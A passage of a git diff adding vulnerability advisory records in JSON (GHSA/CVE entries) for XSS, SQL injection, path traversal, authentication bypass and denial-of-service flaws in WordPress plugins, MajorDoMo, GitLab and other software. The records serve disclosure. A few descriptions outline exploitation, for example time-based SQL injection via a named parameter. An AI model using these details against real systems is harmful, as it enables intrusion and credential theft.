"CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1404" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/assets/js/um-members.js#L515" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members.php#L348" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3458086" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ba62b804-f101-4e29-8304-fb2b7dad333c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json b/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json new file mode 100644 index 0000000000000..30189cc7dbd4c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwcq-x7gx-g26f", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-8308" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Key Software Solutions Inc. INFOREX- General Information Management System allows XSS Through HTTP Headers.This issue affects INFOREX- General Information Management System: from 2025 and before through 18022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8308" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0075" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json b/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json index d0c9cc2713e36..c167ddd1325b3 100644 --- a/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json +++ b/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json b/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json new file mode 100644 index 0000000000000..576b5627e73f5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwfj-gc28-j2fg", + "modified": "2026-02-13T18:31:24Z", + "published": "2026-02-13T18:31:24Z", + "aliases": [ + "CVE-2025-70091" + ], + "details": "A cross-site scripting (XSS) vulnerability in the Customers function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Phone Number parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70091" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70091.md" + }, + { + "type": "WEB", + "url": "https://www.opensourcepos.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vx2f-2j7r-3p8x/GHSA-vx2f-2j7r-3p8x.json b/advisories/unreviewed/2026/02/GHSA-vx2f-2j7r-3p8x/GHSA-vx2f-2j7r-3p8x.json new file mode 100644 index 0000000000000..e09d79e43b652 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vx2f-2j7r-3p8x/GHSA-vx2f-2j7r-3p8x.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vx2f-2j7r-3p8x", + "modified": "2026-02-19T00:30:28Z", + "published": "2026-02-19T00:30:28Z", + "aliases": [ + "CVE-2019-25349" + ], + "details": "ScadaApp for iOS 1.1.4.0 contains a denial of service vulnerability that allows attackers to crash the application by inputting an oversized buffer in the Servername field. Attackers can paste a 257-character buffer during login to trigger an application crash on iOS devices.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25349" + }, + { + "type": "WEB", + "url": "https://apps.apple.com/ca/app/scadaapp/id1206266634" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47678" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/scadaapp-for-ios-servername-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vxq8-hcg5-56j6/GHSA-vxq8-hcg5-56j6.json b/advisories/unreviewed/2026/02/GHSA-vxq8-hcg5-56j6/GHSA-vxq8-hcg5-56j6.json new file mode 100644 index 0000000000000..19bb555ff14ae --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vxq8-hcg5-56j6/GHSA-vxq8-hcg5-56j6.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vxq8-hcg5-56j6", + "modified": "2026-02-16T18:31:29Z", + "published": "2026-02-16T18:31:29Z", + "aliases": [ + "CVE-2019-25392" + ], + "details": "Smoothwall Express 3.1-SP4-polar-x86_64-update9 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the IP parameter. Attackers can send POST requests to the iptools.cgi endpoint with script payloads in the IP parameter to execute arbitrary JavaScript in victim browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25392" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46333" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/smoothwall-express-iptoolscgi-cross-site-scripting" + }, + { + "type": "WEB", + "url": "http://www.smoothwall.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T18:19:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2v5-vxvg-mqgh/GHSA-w2v5-vxvg-mqgh.json b/advisories/unreviewed/2026/02/GHSA-w2v5-vxvg-mqgh/GHSA-w2v5-vxvg-mqgh.json new file mode 100644 index 0000000000000..a3c5d1f63ae8c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2v5-vxvg-mqgh/GHSA-w2v5-vxvg-mqgh.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2v5-vxvg-mqgh", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T18:32:57Z", + "aliases": [ + "CVE-2025-67905" + ], + "details": "Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a related issue to CVE-2023-28892. To exploit this, an attacker must create a file in a given folder path and intercept the application log file deletion flow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67905" + }, + { + "type": "WEB", + "url": "https://Malwarebytes.com" + }, + { + "type": "WEB", + "url": "https://www.malwarebytes.com/secure/cves/cve-2025-67905" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T17:21:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2vm-pjj6-6q8j/GHSA-w2vm-pjj6-6q8j.json b/advisories/unreviewed/2026/02/GHSA-w2vm-pjj6-6q8j/GHSA-w2vm-pjj6-6q8j.json new file mode 100644 index 0000000000000..36cc31e11fbf6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2vm-pjj6-6q8j/GHSA-w2vm-pjj6-6q8j.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2vm-pjj6-6q8j", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25343" + ], + "details": "NextVPN 4.10 contains an insecure file permissions vulnerability that allows local users to modify executable files with full access rights. Attackers can replace system executables with malicious files to gain SYSTEM or Administrator privileges through unauthorized file modification.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25343" + }, + { + "type": "WEB", + "url": "https://vm3max.site" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47831" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/nextvpn-insecure-file-permissions" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json b/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json new file mode 100644 index 0000000000000..a744ef0b04dbf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2w8-j4gc-v26q", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-2426" + ], + "details": "The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'file' parameter in the file deletion functionality. This is due to insufficient validation of user-supplied file paths, allowing directory traversal sequences. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can lead to remote code execution when critical files like wp-config.php are deleted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2426" + }, + { + "type": "WEB", + "url": "https://github.com/lesterchan/wp-downloadmanager/commit/d3470a8971d9043438c8aad281cf37d14fefa208" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/tags/1.69/download-manager.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/trunk/download-manager.php#L215" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3f791dd-7c24-45e3-b4f6-b8d7e594c568?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2wv-47q4-8cfp/GHSA-w2wv-47q4-8cfp.json b/advisories/unreviewed/2026/02/GHSA-w2wv-47q4-8cfp/GHSA-w2wv-47q4-8cfp.json new file mode 100644 index 0000000000000..4bb240479877f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2wv-47q4-8cfp/GHSA-w2wv-47q4-8cfp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2wv-47q4-8cfp", + "modified": "2026-02-13T06:30:48Z", + "published": "2026-02-13T06:30:48Z", + "aliases": [ + "CVE-2025-1924" + ], + "details": "A vulnerability has been found in Vnet/IP Interface Package provided by Yokogawa Electric Corporation.\nIf affected product receive maliciously crafted packets, a DoS attack may cause Vnet/IP communication functions to stop or arbitrary programs to be executed.\nThe affected products and versions are as follows: Vnet/IP Interface Package (for CENTUM VP R6 VP6C3300, CENTUM VP R7 VP7C3300) R1.07.00 or earlier", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1924" + }, + { + "type": "WEB", + "url": "https://web-material3.yokogawa.com/1/39281/files/YSAR-26-0002-E.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-191" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T05:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2x2-hcw6-22p4/GHSA-w2x2-hcw6-22p4.json b/advisories/unreviewed/2026/02/GHSA-w2x2-hcw6-22p4/GHSA-w2x2-hcw6-22p4.json new file mode 100644 index 0000000000000..18a0a61f36af2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2x2-hcw6-22p4/GHSA-w2x2-hcw6-22p4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2x2-hcw6-22p4", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-1988" + ], + "details": "The Flexi Product Slider and Grid for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.0.5 via the `flexipsg_carousel` shortcode. This is due to the `theme` parameter being directly concatenated into a file path without proper sanitization or validation, allowing directory traversal. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server via the `theme` parameter granted they can create posts with shortcodes.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1988" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/22.html" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/98.html" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/flexi-product-slider-grid/tags/1.0.5/includes/class-flexipsg-shortcode.php#L82" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/flexi-product-slider-grid/trunk/includes/class-flexipsg-shortcode.php#L82" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ffdd5446-5835-4976-b764-9b5c75251438?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w33v-jcj5-8c6f/GHSA-w33v-jcj5-8c6f.json b/advisories/unreviewed/2026/02/GHSA-w33v-jcj5-8c6f/GHSA-w33v-jcj5-8c6f.json new file mode 100644 index 0000000000000..c82315e5382f0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w33v-jcj5-8c6f/GHSA-w33v-jcj5-8c6f.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w33v-jcj5-8c6f", + "modified": "2026-02-12T03:31:01Z", + "published": "2026-02-12T03:31:01Z", + "aliases": [ + "CVE-2026-1729" + ], + "details": "The AdForest theme for WordPress is vulnerable to authentication bypass in all versions up to, and including, 6.0.12. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the 'sb_login_user_with_otp_fun' function. This makes it possible for unauthenticated attackers to log in as arbitrary users, including administrators.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1729" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/adforest-classified-wordpress-theme/19481695" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/34fd42cb-3868-4b1c-bc56-575faf01e8f3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T02:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json b/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json new file mode 100644 index 0000000000000..d0fa6dd3ed933 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w35p-gjc5-2g6r", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-2230" + ], + "details": "The Booking Calendar plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 10.14.14 via the handle_ajax_save function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, and booking permissions granted by an Administrator, to modify other users' plugin settings, such as booking calendar display options, which can disrupt the booking calendar functionality for the targeted user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2230" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/booking/trunk/includes/save-user-meta/save-user-meta.php#L90" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3456856" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60f7df44-22f9-4a9e-a20c-4b8628674079?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w366-h875-fm53/GHSA-w366-h875-fm53.json b/advisories/unreviewed/2026/02/GHSA-w366-h875-fm53/GHSA-w366-h875-fm53.json new file mode 100644 index 0000000000000..d2a2dd446e416 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w366-h875-fm53/GHSA-w366-h875-fm53.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w366-h875-fm53", + "modified": "2026-02-19T00:30:30Z", + "published": "2026-02-19T00:30:30Z", + "aliases": [ + "CVE-2026-27179" + ], + "details": "MajorDoMo (aka Major Domestic Module) contains an unauthenticated SQL injection vulnerability in the commands module. The commands_search.inc.php file directly interpolates the $_GET['parent'] parameter into multiple SQL queries without sanitization or parameterized queries. The commands module is loadable without authentication via the /objects/?module=commands endpoint, which includes arbitrary modules by name and calls their usual() method. Time-based blind SQL injection is exploitable using UNION SELECT SLEEP() syntax. Because MajorDoMo stores admin passwords as unsalted MD5 hashes in the users table, successful exploitation enables extraction of credentials and subsequent admin panel access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27179" + }, + { + "type": "WEB", + "url": "https://github.com/sergejey/majordomo/pull/1177" + }, + { + "type": "WEB", + "url": "https://chocapikk.com/posts/2026/majordomo-revisited" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/majordomo-unauthenticated-sql-injection-in-commands-module" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w3jh-c422-596p/GHSA-w3jh-c422-596p.json b/advisories/unreviewed/2026/02/GHSA-w3jh-c422-596p/GHSA-w3jh-c422-596p.json new file mode 100644 index 0000000000000..e754d7a7fa5e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w3jh-c422-596p/GHSA-w3jh-c422-596p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w3jh-c422-596p", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-12821" + ], + "details": "The NewsBlogger theme for WordPress is vulnerable to Cross-Site Request Forgery in versions 0.2.5.6 to 0.2.6.1. This is due to missing or incorrect nonce validation on the newsblogger_install_and_activate_plugin() function. This makes it possible for unauthenticated attackers to upload arbitrary files and achieve remote code execution via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This is due to a reverted fix of CVE-2025-1305.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12821" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/browser/newsblogger/0.2.5.8/functions.php#L499" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9f33096a-dfd5-48c1-84d8-30a0faa2a7f5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w3r7-h5w7-jf97/GHSA-w3r7-h5w7-jf97.json b/advisories/unreviewed/2026/02/GHSA-w3r7-h5w7-jf97/GHSA-w3r7-h5w7-jf97.json new file mode 100644 index 0000000000000..727dfd3727bc6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w3r7-h5w7-jf97/GHSA-w3r7-h5w7-jf97.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w3r7-h5w7-jf97", + "modified": "2026-02-13T21:31:37Z", + "published": "2026-02-13T21:31:37Z", + "aliases": [ + "CVE-2025-25049" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25049" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w44h-2j78-hvfm/GHSA-w44h-2j78-hvfm.json b/advisories/unreviewed/2026/02/GHSA-w44h-2j78-hvfm/GHSA-w44h-2j78-hvfm.json new file mode 100644 index 0000000000000..6a3963273d962 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w44h-2j78-hvfm/GHSA-w44h-2j78-hvfm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w44h-2j78-hvfm", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-47205" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.8.3332 build 20251128 and later\nQuTS hero h5.2.8.3321 build 20251117 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47205" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w487-9r9p-6p96/GHSA-w487-9r9p-6p96.json b/advisories/unreviewed/2026/02/GHSA-w487-9r9p-6p96/GHSA-w487-9r9p-6p96.json new file mode 100644 index 0000000000000..cbdeadfd0be3b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w487-9r9p-6p96/GHSA-w487-9r9p-6p96.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w487-9r9p-6p96", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2026-1456" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.7 before 18.7.4, and 18.8 before 18.8.4 that could have allowed an unauthenticated user to cause denial of service through CPU exhaustion by submitting specially crafted markdown files that trigger exponential processing in markdown preview.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": 